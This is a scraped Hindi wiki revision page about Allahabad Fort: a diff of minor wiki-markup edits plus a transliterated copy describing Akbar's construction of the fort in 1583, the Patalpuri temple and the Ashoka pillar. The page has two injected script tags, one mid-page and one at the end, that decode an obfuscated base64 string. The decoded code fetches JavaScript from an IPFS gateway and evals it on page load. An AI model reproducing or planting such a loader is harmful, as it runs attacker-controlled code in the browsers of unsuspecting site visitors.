Difference between revisions of "इलाहाबाद क़िला"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
[[चित्र:Fort-Of-Allahabad.jpg|thumb|250px|इलाहाबाद क़िले का एक दृश्य]]
 
[[चित्र:Fort-Of-Allahabad.jpg|thumb|250px|इलाहाबाद क़िले का एक दृश्य]]
*इलाहाबाद क़िला [[उत्तर प्रदेश]] के [[इलाहाबाद]] शहर में स्थित है।  
+
'''इलाहाबाद क़िला''' [[उत्तर प्रदेश]] के [[इलाहाबाद]] शहर में स्थित है।  
 
*[[गंगा नदी|गंगा]]-[[यमुना नदी|यमुना]] के पवित्र [[संगम इलाहाबाद|संगम]] के किनारे स्थित इस भव्य क़िले का निर्माण बादशाह [[अकबर]] ने 1583 ई. में करवाया था।
 
*[[गंगा नदी|गंगा]]-[[यमुना नदी|यमुना]] के पवित्र [[संगम इलाहाबाद|संगम]] के किनारे स्थित इस भव्य क़िले का निर्माण बादशाह [[अकबर]] ने 1583 ई. में करवाया था।
*यह क़िला दोनों नदियों के संगम स्थल पर ख़ासतौर पर निर्मित किया गया था। इस क़िले में तीन बड़ी गैलरी हैं जहाँ पर ऊँची मीनारें हैं।
+
*इलाहाबाद क़िला दोनों नदियों के संगम स्थल पर ख़ासतौर पर निर्मित किया गया था। इस क़िले में तीन बड़ी गैलरी हैं जहाँ पर ऊँची मीनारें हैं।
*आज यह क़िला सशस्त्र सेना के अधीन है तथा पर्यटकों को इसमें स्थित '''पातालपुरी मंदिर''' एवं अक्षय वट-वृक्ष तक जाने की अनुमति है।
+
*आज यह क़िला सशस्त्र सेना के अधीन है तथा पर्यटकों को इसमें स्थित 'पातालपुरी मंदिर' एवं [[अक्षय वट]]-वृक्ष तक जाने की अनुमति है।
*भारतीय इतिहास के प्राचीन [[बौद्ध]] काल में [[प्रयाग]] की महत्ता का प्रमाण अशोक स्तंभ के ऊपर उत्कीर्ण अभिलेखों से भी मिलता है, जो आज भी प्राचीन इलाहाबाद क़िले के मुख्य द्वार के भीतर मौजूद है।
+
*[[भारतीय इतिहास]] के प्राचीन [[बौद्ध]] काल में [[प्रयाग]] की महत्ता का प्रमाण अशोक स्तंभ के ऊपर उत्कीर्ण अभिलेखों से भी मिलता है, जो आज भी प्राचीन इलाहाबाद क़िले के मुख्य द्वार के भीतर मौजूद है।
  
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=

Revision as of 10:08, 12 February 2012

thumb|250px|ilahabad qile ka ek drishy ilahabad qila uttar pradesh ke ilahabad shahar mean sthit hai.

  • ganga-yamuna ke pavitr sangam ke kinare sthit is bhavy qile ka nirman badashah akabar ne 1583 ee. mean karavaya tha.
  • ilahabad qila donoan nadiyoan ke sangam sthal par khasataur par nirmit kiya gaya tha. is qile mean tin b di gailari haian jahaan par ooanchi minarean haian.
  • aj yah qila sashastr sena ke adhin hai tatha paryatakoan ko isamean sthit 'patalapuri mandir' evan akshay vat-vriksh tak jane ki anumati hai.
  • bharatiy itihas ke prachin bauddh kal mean prayag ki mahatta ka praman ashok stanbh ke oopar utkirn abhilekhoan se bhi milata hai, jo aj bhi prachin ilahabad qile ke mukhy dvar ke bhitar maujood hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>